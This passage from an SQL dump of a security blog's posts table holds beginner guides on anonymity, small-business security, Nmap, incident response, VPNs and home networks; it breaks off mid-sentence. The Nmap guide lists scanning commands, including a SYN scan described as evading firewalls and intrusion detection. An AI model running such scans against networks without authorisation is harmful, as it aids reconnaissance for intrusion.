safe and anonymous is to always operate within legal boundaries.\r\n<h4><strong>Use Secure Browsers and Search Engines</strong></h4>\r\nIf you’re serious about your privacy, you should also use secure browsers and search engines. Mainstream browsers like Chrome or Safari collect and share a lot of information about you. Instead, try privacy-focused browsers like Brave, which offer built-in privacy settings that block trackers and ads.\r\n\r\nWhen it comes to search engines, avoid Google. Instead, try search engines like DuckDuckGo or Startpage, which don’t track your search history or personal information. These tools will help you reduce the amount of data being collected about you while you browse the web.\r\n<h4><strong>Anonymity is Possible, But Not Foolproof</strong></h4>\r\nStaying anonymous online requires effort and the right tools. While it’s possible to reduce your digital footprint, it’s almost impossible to be completely invisible on the internet. By limiting personal information, using strong passwords, employing VPNs and TOR, and being cautious on social media, you can greatly increase your level of anonymity.', '', NULL, NULL, 1, 'draft', '2024-09-21 21:42:42', '2026-01-12 21:41:44', 'Information Security', 'How to Stay Anonymous Online: A Beginner\'s Guide to Protecting Your Privacy', '', NULL),
(106, 'Cybersecurity for Small Businesses: Best Practices', 'cybersecurity-for-small-businesses-best-practices', 'As a small business owner, it’s easy to think that only large corporations are targeted by hackers. However, the reality is quite different—small businesses are often seen as low-hanging fruit because they typically don’t invest as much in cybersecurity. This makes it essential to put strong defenses in place. In this article, we’ll outline practical steps your business can take to safeguard itself from cyber threats.\r\n<h3>1. <strong>Employee Education</strong></h3>\r\n<img class=\"size-medium wp-image-3406 alignleft\" src=\"https://infoseclabs.io/wp-content/uploads/2024/09/cybersecurity-training-illustration-3-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />The most common entry point for cybercriminals is through your employees, which is why educating your staff should be the first step in your cybersecurity strategy. Even with the most advanced security measures in place, one employee mistakenly clicking on a phishing email or downloading malware can undo all your efforts. Training your team on recognizing cyber threats, like phishing scams, is crucial for maintaining a secure business environment.\r\n\r\nEducation should be ongoing, not a one-time event. New threats emerge regularly, and your staff must be equipped to identify them. Regular cybersecurity workshops or online training sessions are effective ways to keep everyone informed. When your employees know what to watch for, they’re less likely to fall victim to social engineering attacks, which are the most common tactics used by hackers. By making cybersecurity training a priority, you transform your workforce into a strong line of defense against attackers.\r\n<h3>2. <strong>Strong Password Policies</strong></h3>\r\nWeak passwords are an open door for cybercriminals, and they remain one of the most common vulnerabilities in businesses today. A strong password policy is vital for ensuring that this isn’t an easy entry point for attackers. Encourage employees to use long, complex passwords made up of letters, numbers, and symbols. It’s also helpful to establish a rule requiring passwords to be updated every few months.\r\n\r\nIn addition to strong passwords, implementing multi-factor authentication (MFA) adds an extra layer of protection. MFA requires not only a password but also another piece of information, like a code sent to a smartphone or an authentication app, before access is granted. This makes it much harder for hackers to gain unauthorized access, even if they’ve managed to steal a password.\r\n<h3>3. <strong>Secure Your Wi-Fi Network</strong></h3>\r\nA Wi-Fi network is a necessity for most businesses, but it’s also a potential vulnerability. Unsecured or poorly configured Wi-Fi can allow cybercriminals easy access to your internal systems. Begin by securing your network with strong encryption, such as WPA3. Using outdated or weaker encryption methods, like WEP, makes your network easier to crack and leaves your business exposed.\r\n\r\nAdditionally, avoid using the default passwords that come with routers and network devices. These are often well-known and easily exploitable by hackers. Changing your network’s settings to use a strong, unique password adds another layer of security. For added protection, create a separate guest network for customers and visitors, keeping your business systems and data isolated.\r\n<h3>4. <strong>Update Software Regularly</strong></h3>\r\nOutdated software is a common target for cybercriminals because it often contains known vulnerabilities that haven’t been patched. Keeping all your software up to date is one of the easiest ways to protect your business. This includes not only operating systems but also any applications or tools you use, such as web browsers, antivirus software, and office software.\r\n\r\nEnable automatic updates wherever possible to ensure you’re always running the latest versions. Periodically check for updates for any devices connected to your network, including routers, printers, and IoT devices. By staying on top of updates, you’re closing off potential entry points and reducing the likelihood of an attack exploiting known vulnerabilities.\r\n<h3>5. <strong>Backup Your Data</strong></h3>\r\n<img class=\"size-medium wp-image-3408 alignright\" src=\"https://infoseclabs.io/wp-content/uploads/2024/09/backup-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />Data is the lifeblood of any business, and losing it can be devastating. Whether it’s through a ransomware attack, a hardware failure, or a natural disaster, the consequences of losing business-critical data are severe. That’s why it’s essential to regularly back up all important information. Ideally, backups should be stored in multiple locations, including both physical devices and the cloud, to provide redundancy.\r\n\r\nHaving backups is only useful if they work when you need them. Regularly test your backups to make sure the data can be restored without issue. In the event of an attack or data loss, quick access to your backups ensures your business can resume operations with minimal disruption, avoiding costly downtime.\r\n<h3>6. <strong>Install a Firewall and Antivirus Software</strong></h3>\r\nFirewalls and antivirus software are fundamental components of a solid cybersecurity strategy. A firewall acts as a barrier between your internal network and external threats, monitoring and controlling incoming and outgoing traffic. Ensure your firewall is properly configured and always kept up to date to avoid becoming an easy target for attackers looking for vulnerabilities.\r\n\r\nIn addition to a firewall, reliable antivirus and anti-malware software can help detect and remove malicious software before it causes significant damage. This software should be installed on all company devices, from desktops to mobile phones, to ensure comprehensive protection. By using these tools in combination, you’re significantly reducing the risk of unauthorized access to your systems.\r\n<h3>7. <strong>Limit Access to Sensitive Information</strong></h3>\r\nNot all employees need access to every part of your business\'s data and systems. Limiting access by implementing role-based access control (RBAC) ensures that employees can only access the information necessary for their job functions. This way, even if an employee’s account is compromised, the damage is contained to a smaller portion of your network.\r\n\r\nIn addition to limiting access, it\'s important to monitor who has access to sensitive information. Conduct regular audits to review user permissions and ensure that only authorized individuals have access to critical systems. This approach not only protects your data but also helps you comply with privacy regulations, which are becoming more stringent worldwide.\r\n<h3>8. <strong>Create a Cybersecurity Plan</strong></h3>\r\nWithout a plan, responding to a cyber incident can be chaotic and inefficient. A comprehensive cybersecurity plan outlines how your business will protect data, detect threats, respond to incidents, and recover from attacks. The plan should include roles and responsibilities for your team members, so everyone knows what to do in the event of a breach.\r\n\r\nYour plan should also cover external resources, like cybersecurity consultants or law enforcement, and detail how and when they should be contacted. Regularly reviewing and updating your plan is crucial as new threats emerge. Having a well-prepared, actionable plan can make all the difference in mitigating the impact of a cyberattack on your business.\r\n<h3>Don\'t Forget</h3>\r\nCybersecurity is not just for large corporations. Small businesses are increasingly becoming targets due to perceived weaknesses in their defenses. By taking proactive measures—starting with employee training and continuing through strong password policies, secure Wi-Fi networks, and comprehensive cybersecurity planning—you can significantly reduce your risk of being compromised. Staying vigilant and prepared will ensure that your business remains resilient in the face of growing cyber threats.', '', NULL, NULL, 1, 'draft', '2024-09-05 13:37:50', '2026-01-12 21:41:44', 'Information Security', 'Cybersecurity for Small Businesses: Best Practices', '', NULL),
(107, 'Getting Started with Nmap: A Comprehensive Beginner\'s Guide', 'getting-started-with-nmap-a-comprehensive-beginners-guide', '<h3><strong>Why Nmap is Essential</strong></h3>\r\nNmap is a network scanning tool that helps you discover devices, assess vulnerabilities, and understand network structures. Its capabilities extend from simple port scanning to complex network mapping, making it a fundamental tool for network administrators and security professionals.\r\n<h3><strong>Top 10 Use Cases for Nmap</strong></h3>\r\n<ol>\r\n 	<li><strong>Network Discovery</strong>\r\nNmap can scan a range of IP addresses to discover all devices connected to a network. This feature is crucial for mapping out your network and identifying which devices are active and reachable. For instance, if you\'re managing a large network, network discovery helps you keep track of all connected devices, ensuring nothing goes unnoticed.</li>\r\n 	<li><strong>Port Scanning</strong>\r\nPort scanning is one of Nmap’s most commonly used features. It allows you to determine which ports on a system are open and listening for connections. This is essential for assessing the attack surface of your network. Open ports can potentially be entry points for attackers, so identifying them helps in securing your network.</li>\r\n 	<li><strong>Service Identification</strong>\r\nBeyond just identifying open ports, Nmap also detects the services running on those ports. It can provide details about the software and its version, which is useful for understanding what is operating on your network and ensuring that outdated or vulnerable software is updated.</li>\r\n 	<li><strong>Vulnerability Assessment</strong>\r\nNmap can help identify known vulnerabilities in the services and software running on your network. By using scripts from the Nmap Scripting Engine (NSE), you can automate vulnerability checks and uncover weaknesses that need attention. This proactive approach is vital for preventing potential security breaches.</li>\r\n 	<li><strong>Network Mapping</strong>\r\nNmap can create visual representations of your network, showing how devices are interconnected. This network mapping helps administrators understand the network structure, identify potential bottlenecks, and optimize performance. Visualizing the network layout can also aid in troubleshooting and planning.</li>\r\n 	<li><strong>Firewall Testing</strong>\r\nTesting firewalls is crucial to ensure they are effectively protecting your network. Nmap can simulate external attacks by scanning your network from outside, helping you assess which ports and services are exposed. This information allows you to fine-tune firewall rules and enhance network security.</li>\r\n 	<li><strong>OS Fingerprinting</strong>\r\nNmap can attempt to determine the operating system of a target host based on how it responds to various probes. This information is valuable for understanding the network environment and tailoring security measures accordingly. Knowing the OS helps in applying specific patches and configurations.</li>\r\n 	<li><strong>Scriptable Automation</strong>\r\nThe Nmap Scripting Engine (NSE) allows users to write and use custom scripts for various tasks. This feature supports advanced scanning, data collection, and even exploitation. Automating these tasks can save time and improve efficiency in security assessments.</li>\r\n 	<li><strong>Penetration Testing</strong>\r\nEthical hackers and penetration testers use Nmap to identify potential entry points for attacks. By discovering weak spots in the network, they can suggest improvements and strengthen defenses. Nmap’s comprehensive scanning capabilities make it an indispensable tool for penetration testing.</li>\r\n 	<li><strong>Network Monitoring</strong>\r\nNmap can also be used for passive network monitoring. By analyzing network traffic and reporting on the devices and services in use, you can keep an eye on network activity without actively scanning. This ongoing monitoring helps in detecting anomalies and maintaining network health.</li>\r\n</ol>\r\n<h3><strong>Essential Nmap Commands for Beginners</strong></h3>\r\n<ol>\r\n 	<li><strong>Basic Scan</strong>\r\nCommand: <code>nmap &lt;target&gt;</code>\r\n<strong>Purpose</strong>: Conducts a basic scan of the target with default settings.\r\n<strong>Usage</strong>: This is the simplest form of scanning, providing information about open ports and services on the target.</li>\r\n 	<li><strong>Scan Specific Ports</strong>\r\nCommand: <code>nmap -p &lt;port1,port2,...&gt; &lt;target&gt;</code>\r\n<strong>Purpose</strong>: Scans specified ports on the target.\r\n<strong>Usage</strong>: Useful when you need to check specific ports rather than scanning all 65535 ports, which saves time and resources.</li>\r\n 	<li><strong>Aggressive Scan</strong>\r\nCommand: <code>nmap -A &lt;target&gt;</code>\r\n<strong>Purpose</strong>: Performs a comprehensive scan including OS detection, version detection, script scanning, and traceroute.\r\n<strong>Usage</strong>: Provides detailed information about the target, making it suitable for in-depth analysis.</li>\r\n 	<li><strong>OS Detection</strong>\r\nCommand: <code>nmap -O &lt;target&gt;</code>\r\n<strong>Purpose</strong>: Attempts to determine the operating system of the target.\r\n<strong>Usage</strong>: Knowing the OS helps in identifying potential vulnerabilities and implementing appropriate security measures.</li>\r\n 	<li><strong>Service Version Detection</strong>\r\nCommand: <code>nmap -sV &lt;target&gt;</code>\r\n<strong>Purpose</strong>: Detects versions of services running on open ports.\r\n<strong>Usage</strong>: Helps identify outdated or vulnerable software versions that need to be updated or patched.</li>\r\n 	<li><strong>Scan a Range of IPs</strong>\r\nCommand: <code>nmap &lt;start-ip&gt;-&lt;end-ip&gt;</code>\r\n<strong>Purpose</strong>: Scans a range of IP addresses.\r\n<strong>Usage</strong>: Efficient for scanning a segment of a network to discover active hosts and open ports.</li>\r\n 	<li><strong>Scan Subnet</strong>\r\nCommand: <code>nmap &lt;network&gt;/CIDR</code>\r\n<strong>Purpose</strong>: Scans all IPs in a subnet.\r\n<strong>Usage</strong>: Ideal for scanning entire subnets, such as 192.168.1.0/24, to get a comprehensive view of network devices.</li>\r\n 	<li><strong>Stealth Scan (SYN Scan)</strong>\r\nCommand: <code>nmap -sS &lt;target&gt;</code>\r\n<strong>Purpose</strong>: Performs a stealthy SYN scan.\r\n<strong>Usage</strong>: Often used because it is less likely to be detected by firewalls and intrusion detection systems.</li>\r\n 	<li><strong>UDP Scan</strong>\r\nCommand: <code>nmap -sU &lt;target&gt;</code>\r\n<strong>Purpose</strong>: Scans for open UDP ports.\r\n<strong>Usage</strong>: Essential for identifying services running on UDP, which is crucial for a complete security assessment.</li>\r\n 	<li><strong>TCP Connect Scan</strong>\r\nCommand: <code>nmap -sT &lt;target&gt;</code>\r\n<strong>Purpose</strong>: Performs a full TCP connection scan.\r\n<strong>Usage</strong>: Completes the TCP handshake, making it more reliable but also more detectable.</li>\r\n 	<li><strong>Scan for Specific Vulnerabilities</strong>\r\nCommand: <code>nmap --script vuln &lt;target&gt;</code>\r\n<strong>Purpose</strong>: Uses vulnerability scripts to scan for known vulnerabilities.\r\n<strong>Usage</strong>: Quickly identifies potential vulnerabilities on the target, providing a starting point for remediation.</li>\r\n</ol>\r\nBy understanding its various uses and commands, you can enhance your ability to discover vulnerabilities, map network structures, and monitor network activity. Whether you’re new to cybersecurity or looking to expand your toolkit, Nmap offers powerful features to help safeguard your network.\r\n<a href=\"https://infoseclabs.io/wp-content/uploads/simple-file-list/nmap_cheet_sheet_v7-3.pdf\"><span style=\"font-size: 18pt\"><strong>Download Nmap Cheet Sheet</strong></span></a>', '', NULL, NULL, 1, 'draft', '2024-08-12 21:49:28', '2026-01-12 21:41:44', 'Information Security', 'Getting Started with Nmap: A Comprehensive Beginner\'s Guide', '', NULL),
(108, 'How to Create a Cyber Incident Response Plan: A Step-by-Step Guide', 'how-to-create-a-cyber-incident-response-plan-a-step-by-step-guide', 'Cyber threats are more prevalent and sophisticated than ever before. Whether you\'re a small business owner or part of a large enterprise, having a robust Cyber Incident Response Plan (CIRP) is essential to protect your organization from potential cyberattacks. A well-structured CIRP ensures that your organization can quickly and effectively respond to security incidents, minimizing damage and ensuring business continuity. This blog post will guide you through creating an effective Cyber Incident Response Plan.\r\n<h3>Understanding the Importance of a Cyber Incident Response Plan</h3>\r\nBefore diving into the steps, it\'s crucial to understand why a CIRP is vital for your organization:\r\n<ul>\r\n 	<li><strong>Minimize Damage</strong>: A quick response can limit the impact of a cyber incident, reducing financial losses, reputational damage, and operational downtime.</li>\r\n 	<li><strong>Ensure Regulatory Compliance</strong>: Many industries have specific regulations requiring organizations to have incident response plans in place. A CIRP can help you meet these legal and regulatory requirements.</li>\r\n 	<li><strong>Protect Sensitive Data</strong>: A prompt response to a cyber incident can prevent the loss or compromise of sensitive information, including customer data, intellectual property, and financial records.</li>\r\n</ul>\r\n<h3>Step 1: Establish a Cyber Incident Response Team (CIRT)</h3>\r\nThe first step in creating a CIRP is to establish a Cyber Incident Response Team (CIRT). This team is responsible for managing and executing the response plan. Here’s how to assemble your team:\r\n<ul>\r\n 	<li><strong>Identify Key Members</strong>: Include representatives from IT, legal, public relations, human resources, and senior management. Ensure that each member understands their role in the event of a cyber incident.</li>\r\n 	<li><strong>Define Roles and Responsibilities</strong>: Clearly outline the responsibilities of each team member. For example, IT personnel may handle technical aspects, while the PR team manages communication with the public.</li>\r\n 	<li><strong>Provide Training</strong>: Regularly train your CIRT members on the latest cybersecurity threats and incident response procedures. Conduct mock drills to ensure they are prepared to respond effectively.</li>\r\n</ul>\r\n<h3>Step 2: Identify and Classify Potential Cyber Threats</h3>\r\nUnderstanding the types of threats your organization may face is crucial to developing an effective response plan. Common cyber threats include:\r\n<ul>\r\n 	<li><strong>Malware and Ransomware</strong>: Malicious software that can disrupt operations or lock down systems until a ransom is paid.</li>\r\n 	<li><strong>Phishing Attacks</strong>: Deceptive emails or messages designed to trick employees into revealing sensitive information or downloading malware.</li>\r\n 	<li><strong>Insider Threats</strong>: Employees or contractors who intentionally or unintentionally compromise security.</li>\r\n 	<li><strong>DDoS Attacks</strong>: Distributed Denial of Service attacks that overwhelm your network, causing it to become unavailable.</li>\r\n</ul>\r\nClassify these threats based on their potential impact and likelihood of occurrence. This classification helps prioritize your response efforts and allocate resources effectively.\r\n<h3>Step 3: Develop Incident Detection and Reporting Procedures</h3>\r\nEarly detection is critical in minimizing the impact of a cyber incident. Your CIRP should include detailed procedures for identifying and reporting potential incidents:\r\n<ul>\r\n 	<li><strong>Implement Monitoring Tools</strong>: Use advanced monitoring tools to detect unusual network activity, unauthorized access, or other signs of a cyber incident.</li>\r\n 	<li><strong>Establish Reporting Channels</strong>: Ensure that employees know how and where to report suspected incidents. This could be an internal hotline, a dedicated email address, or an online reporting form.</li>\r\n 	<li><strong>Define Escalation Protocols</strong>: Determine when and how incidents should be escalated to higher management or external cybersecurity experts. Escalation protocols should be clearly defined to ensure a swift response.</li>\r\n</ul>\r\n<h3>Step 4: Create a Response and Mitigation Plan</h3>\r\nOnce an incident is detected, your response plan should outline the steps to contain, mitigate, and recover from the incident. Key components include:\r\n<ul>\r\n 	<li><strong>Containment Strategies</strong>: Determine how to isolate affected systems to prevent the spread of the attack. This may involve disconnecting networks, shutting down systems, or restricting access.</li>\r\n 	<li><strong>Eradication and Recovery</strong>: Once the incident is contained, remove the threat from your systems. This may involve deleting malware, patching vulnerabilities, or restoring data from backups.</li>\r\n 	<li><strong>Post-Incident Review</strong>: After the incident is resolved, conduct a thorough review to understand what went wrong and how to prevent future incidents. Document the findings and update your CIRP accordingly.</li>\r\n</ul>\r\n<h3>Step 5: Communication and Coordination</h3>\r\nEffective communication during a cyber incident is crucial for maintaining trust and transparency. Your CIRP should include a communication plan that addresses:\r\n<ul>\r\n 	<li><strong>Internal Communication</strong>: Keep employees informed about the incident and the steps being taken to address it. Ensure that communication is clear and consistent to avoid panic or confusion.</li>\r\n 	<li><strong>External Communication</strong>: If necessary, inform customers, partners, and regulatory authorities about the incident. Be transparent about the impact and the measures being taken to resolve the issue.</li>\r\n 	<li><strong>Media Relations</strong>: Designate a spokesperson to handle media inquiries and public statements. A well-managed communication strategy can help protect your organization’s reputation.</li>\r\n</ul>\r\n<h3>Step 6: Test and Update Your CIRP Regularly</h3>\r\nA Cyber Incident Response Plan is not a one-time effort. It needs to be regularly tested, reviewed, and updated to remain effective:\r\n<ul>\r\n 	<li><strong>Conduct Regular Drills</strong>: Simulate cyber incidents to test your CIRP and identify any gaps or weaknesses. Use these drills to refine your response strategies and improve team coordination.</li>\r\n 	<li><strong>Review and Update</strong>: Regularly review your CIRP to ensure it aligns with the latest cybersecurity best practices and addresses emerging threats. Update the plan as necessary to reflect changes in your organization’s structure, technology, or regulatory environment.</li>\r\n</ul>\r\n&nbsp;\r\n\r\nCreating a Cyber Incident Response Plan is a critical step in safeguarding your organization from cyber threats. By establishing a dedicated response team, identifying potential threats, developing detection and response procedures, and maintaining effective communication, you can minimize the impact of cyber incidents and ensure a swift recovery. Remember, a CIRP is a living document that requires ongoing attention and refinement to stay effective in an ever-evolving cybersecurity landscape.', '', NULL, NULL, 1, 'draft', '2024-08-11 23:46:14', '2026-01-12 21:41:44', 'Information Security', 'How to Create a Cyber Incident Response Plan: A Step-by-Step Guide', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(109, 'How VPNs Work: A Beginner\'s Guide', 'how-vpns-work-a-beginners-guide', 'Online privacy and security are more important than ever. You\'ve probably heard of VPNs (Virtual Private Networks) as a tool to help protect your online activity, but what exactly is a VPN, and how does it work? Let’s break it down in a way that\'s easy to understand.\r\n<h3><strong>What is a VPN?</strong></h3>\r\nA VPN, or Virtual Private Network, is a tool that protects your internet connection. It does this by masking your IP address—essentially your device\'s identifier on the internet—and encrypting your data. Think of a VPN as a secure, private tunnel that connects your device to the internet. When you\'re using a VPN, your online activity is shielded from prying eyes, whether those eyes belong to your Internet Service Provider (ISP), advertisers, or hackers.\r\n<h3><strong>How Does It Work?</strong></h3>\r\nTypically, when you connect to the internet, your data travels from your device to your ISP and then to the website or service you\'re accessing. This means your ISP can see everything you\'re doing online, and the website you\'re visiting can see your IP address, which reveals your general location. This lack of privacy can be concerning, especially when you\'re on public Wi-Fi networks, which are notoriously insecure.\r\n\r\nWhen you use a VPN, your data is first encrypted (converted into unreadable code) before it leaves your device. It then travels through a secure tunnel to a VPN server, where it is decrypted and sent to its destination. The website you’re visiting sees the IP address of the VPN server, not your own. This process helps protect your identity and location, giving you a degree of anonymity online.\r\n<h3><strong>Why Use a VPN?</strong></h3>\r\nVPNs offer several benefits that make them essential for anyone concerned about their online privacy and security:\r\n<ul>\r\n 	<li><strong>Enhanced Privacy</strong>: A VPN hides your IP address and encrypts your data, making it much harder for anyone to track your online activity. This is particularly important in a world where data breaches and tracking are becoming more common.</li>\r\n 	<li><strong>Security on Public Wi-Fi</strong>: Public Wi-Fi networks, like those in cafes or airports, are prime targets for hackers. A VPN secures your connection, making it nearly impossible for hackers to intercept your data.</li>\r\n 	<li><strong>Access to Restricted Content</strong>: Many streaming services and websites restrict access based on your location. With a VPN, you can connect to a server in a different country, allowing you to access content that might otherwise be unavailable to you.</li>\r\n 	<li><strong>Avoid ISP Throttling</strong>: Some ISPs intentionally slow down your internet connection based on your activity, such as streaming or torrenting. A VPN hides your activity from your ISP, preventing them from throttling your connection.</li>\r\n</ul>\r\n<h3><strong>Understanding Advanced VPN Features</strong></h3>\r\nAs you delve deeper into the world of VPNs, you\'ll find that many providers offer advanced features that can enhance your online experience:\r\n<ul>\r\n 	<li><strong>Split Tunneling</strong>: This feature allows you to choose which apps use the VPN and which ones connect directly to the internet. For example, you might want your banking app to use the VPN while your streaming app bypasses it to maximize speed.</li>\r\n 	<li><strong>Ad and Malware Blocking</strong>: Some VPNs offer built-in ad blockers that prevent unwanted ads and pop-ups. Additionally, advanced versions of these features can block trackers and even malicious websites before they can do any harm.</li>\r\n 	<li><strong>Kill Switch</strong>: One of the most critical features of a VPN is the kill switch. If your VPN connection drops unexpectedly, the kill switch automatically disconnects your device from the internet. This ensures that your real IP address and data aren\'t accidentally exposed.</li>\r\n</ul>\r\n<h3><strong>Encryption and VPN Protocols</strong></h3>\r\nEncryption is at the heart of how VPNs protect your data. The two most common encryption algorithms used by VPNs are AES-256 and ChaCha20. Both are considered highly secure and are widely used in the industry.\r\n<ul>\r\n 	<li><strong>AES-256</strong>: This is a type of symmetric encryption, meaning the same key is used to encrypt and decrypt data. It’s known for its robustness and is used by governments and security agencies worldwide.</li>\r\n 	<li><strong>ChaCha20</strong>: Another symmetric encryption method, ChaCha20 is known for its speed and efficiency. It’s particularly useful in situations where high performance is essential.</li>\r\n</ul>\r\nIn addition to encryption, VPNs rely on protocols to establish secure connections. The most popular protocols today are WireGuard and OpenVPN.\r\n<ul>\r\n 	<li><strong>WireGuard</strong>: This is a newer protocol known for its simplicity, speed, and security. It’s becoming the standard for modern VPNs.</li>\r\n 	<li><strong>OpenVPN</strong>: While older, OpenVPN is still widely used and respected for its reliability and flexibility. It allows users to choose between different transmission protocols, such as TCP (Transmission Control Protocol) and UDP (User Datagram Protocol), depending on their needs.</li>\r\n</ul>\r\n<h3><strong>Choosing the Right VPN</strong></h3>\r\nWith so many VPN providers available, choosing the right one can be challenging. Here are some key factors to consider:\r\n<ul>\r\n 	<li><strong>Reputation and Privacy Policy</strong>: Make sure the VPN provider has a solid reputation and a clear, transparent privacy policy. Some VPNs have been caught logging user data, which defeats the purpose of using one in the first place.</li>\r\n 	<li><strong>Server Network</strong>: The more servers a VPN provider has, the better your chances of finding a fast, reliable connection. Look for providers with servers in the regions you\'re most likely to connect to.</li>\r\n 	<li><strong>Extra Features</strong>: Consider what additional features are important to you. Do you need split tunneling, ad-blocking, or a dedicated IP address? Some providers offer these features as standard, while others may charge extra.</li>\r\n 	<li><strong>Value for Money</strong>: VPN prices can vary significantly, so it’s worth shopping around. Some providers offer discounts for long-term subscriptions, but make sure the service meets your needs before committing.</li>\r\n</ul>\r\n<h3><strong>The Future of VPNs and Encryption</strong></h3>\r\nWhile current encryption methods used by VPNs are considered secure, the rise of quantum computing poses a potential threat. Quantum computers, with their ability to perform complex calculations much faster than traditional computers, could theoretically break today’s encryption algorithms in a fraction of the time. Although this technology is still in its early stages, it’s a good idea to stay informed about developments in post-quantum cryptography, which is being designed to resist quantum attacks.\r\n<h3><strong>Overcoming VPN Detection</strong></h3>\r\nNot everyone is thrilled with the idea of VPNs. Governments, corporations, and other entities often try to block VPN traffic to enforce censorship or maintain control over what can be accessed online. They do this through various methods, such as comparing time zones, checking known VPN server IP addresses, and even analyzing the behavior of network traffic.\r\n\r\nTo combat this, some VPNs offer obfuscation techniques that disguise VPN traffic as regular internet traffic. Additionally, DNS leak protection can help prevent your ISP from detecting that you\'re using a VPN. Finally, regular updates to a VPN’s server network can keep you ahead of detection efforts.\r\n\r\nA VPN is a powerful tool that can protect your privacy, enhance your security, and give you access to a broader range of online content. By understanding how VPNs work and what features to look for, you can make an informed decision about which VPN is right for you. Whether you\'re concerned about online privacy, want to secure your connection on public Wi-Fi, or need to bypass geo-restrictions, a VPN is a versatile solution that can meet your needs.\r\n\r\nIf you\'re ready to take the plunge into the world of VPNs, remember to choose a provider that aligns with your needs and offers robust security features. And as technology continues to evolve, staying informed about the latest advancements in VPN technology and encryption will ensure that you remain protected in the digital age.', '', NULL, NULL, 1, 'draft', '2024-08-11 02:38:43', '2026-01-12 21:41:44', 'Information Security', 'How VPNs Work: A Beginner\'s Guide', '', NULL),
(110, 'How to Secure Your Home Network', 'how-to-secure-your-home-network', 'Securing your home network is no longer a luxury—it’s a necessity. With an ever-increasing number of devices connected to the internet, from smartphones and laptops to smart appliances and home security systems, the potential for cyber threats has grown exponentially. A compromised network can lead to severe consequences, including data breaches, identity theft, and unauthorized access to personal information. This guide provides practical and detailed steps to help you secure your home network effectively and protect your digital life.\r\n<h3>Understanding the Importance of Network Security</h3>\r\nYour home network serves as the digital gateway to your personal and family information. It not only connects your devices to the internet but also allows them to communicate with each other. However, if your network is not properly secured, it can become an easy target for cybercriminals. Here are some compelling reasons why securing your home network is crucial:\r\n<ul>\r\n 	<li><strong>Protection of Personal Information</strong>: A compromised network can lead to unauthorized access to sensitive data, such as financial details, personal emails, and confidential documents. This information can be exploited for financial gain, leading to identity theft and fraud.</li>\r\n 	<li><strong>Preventing Unauthorized Access</strong>: An unsecured network is vulnerable to unauthorized users who can connect to it and potentially use your internet connection for illegal activities, which could make you liable.</li>\r\n 	<li><strong>Securing Smart Devices (IoT)</strong>: The rise of the Internet of Things (IoT) has introduced numerous smart devices into homes, from smart thermostats to voice-activated assistants. These devices often have weaker security protocols, making them prime targets for hackers. Securing your network helps protect these devices from being hijacked or exploited.</li>\r\n</ul>\r\n<h3>Steps to Secure Your Home Network</h3>\r\nTo safeguard your home network from cyber threats, follow these detailed steps:\r\n<h4>1. Change Default Router Settings</h4>\r\nRouters typically come with default settings that are well-known to hackers, making them easy targets. To enhance your network\'s security, start by changing the following:\r\n<ul>\r\n 	<li><strong>SSID (Network Name)</strong>: The SSID, or Service Set Identifier, is the name of your wireless network. Change the default SSID to something unique that doesn’t reveal personal information or the router’s brand, which could give hackers clues about potential vulnerabilities. Avoid using identifiable names like your address or family name.</li>\r\n 	<li><strong>Default Passwords</strong>: Routers come with default administrative passwords, which are often simple and widely known. Change this password immediately to a strong, unique one that includes a mix of uppercase and lowercase letters, numbers, and symbols. Aim for a password with at least 12-16 characters to ensure robust security.</li>\r\n</ul>\r\n<h4>2. Enable Network Encryption</h4>\r\nEncryption is essential for protecting the data transmitted over your network from being intercepted by unauthorized users. Most modern routers support advanced encryption protocols. Ensure that your router is configured to use one of the following:\r\n<ul>\r\n 	<li><strong>WPA2</strong>: The WPA2 (Wi-Fi Protected Access 2) protocol is the most widely used encryption method and provides a good level of security. It encrypts the data traveling between your router and connected devices, making it difficult for outsiders to intercept.</li>\r\n 	<li><strong>WPA3</strong>: WPA3 is the latest encryption standard, offering even stronger protection than WPA2. It provides enhanced security against password-guessing attacks and should be used if your router supports it.</li>\r\n</ul>\r\n<h4>3. Create a Guest Network</h4>\r\nA guest network is a separate network for visitors who need internet access. This isolates their devices from your main network, preventing them from accessing your personal devices and shared files.\r\n<ul>\r\n 	<li><strong>Benefits of a Guest Network</strong>: By setting up a guest network, you can ensure that any potential malware on guest devices does not spread to your primary network. Additionally, it adds a layer of privacy, as guests won’t be able to see or interact with your personal devices.</li>\r\n</ul>\r\n<h4>4. Keep Your Router’s Firmware Updated</h4>\r\nRouter manufacturers frequently release firmware updates to patch security vulnerabilities and improve performance. Keeping your router’s firmware up to date is crucial for maintaining security.\r\n<ul>\r\n 	<li><strong>Automatic Updates</strong>: Some routers offer the option to automatically install updates. Enable this feature if available, so you don’t have to manually check for updates regularly.</li>\r\n</ul>\r\n<h4>5. Use Strong Passwords for All Devices</h4>\r\nEach device connected to your network should be protected with a strong, unique password. This includes not only your computers and smartphones but also any IoT devices like smart locks, cameras, and home assistants.\r\n<ul>\r\n 	<li><strong>Password Management</strong>: Consider using a password manager to create and store complex passwords. Avoid using easily guessable passwords like \"123456\" or \"password.\" A strong password should be at least 12 characters long and include a mix of letters, numbers, and symbols.</li>\r\n</ul>\r\n<h4>6. Disable Remote Management</h4>\r\nMany routers offer a remote management feature that allows you to configure your router settings from anywhere. Unless you need this feature, it’s best to disable it, as it opens another potential avenue for unauthorized access to your network.\r\n<h4>7. Enable Firewall Protection</h4>\r\nFirewalls are a critical defense mechanism that helps block unauthorized access to your network. Most routers come with built-in firewall protection, which should be enabled to provide an additional layer of security.\r\n<ul>\r\n 	<li><strong>Software Firewalls</strong>: In addition to your router’s firewall, consider using a software firewall on your devices. This double-layered protection can help block malicious traffic and prevent unauthorized access.</li>\r\n</ul>\r\n<h4>8. Monitor Connected Devices</h4>\r\nRegularly monitoring the devices connected to your network is an effective way to detect unauthorized access. Most routers provide an admin interface where you can view a list of connected devices.\r\n<ul>\r\n 	<li><strong>Taking Action</strong>: If you notice any unfamiliar devices connected to your network, disconnect them immediately and change your Wi-Fi password to prevent future access.</li>\r\n</ul>\r\n<h4>9. Limit DHCP Leases</h4>\r\nDynamic Host Configuration Protocol (DHCP) automatically assigns IP addresses to devices on your network. By limiting the number of DHCP leases, you can control how many devices are allowed to connect to your network simultaneously.\r\n<ul>\r\n 	<li><strong>Set a Maximum Number</strong>: Adjust the DHCP settings in your router’s admin interface to 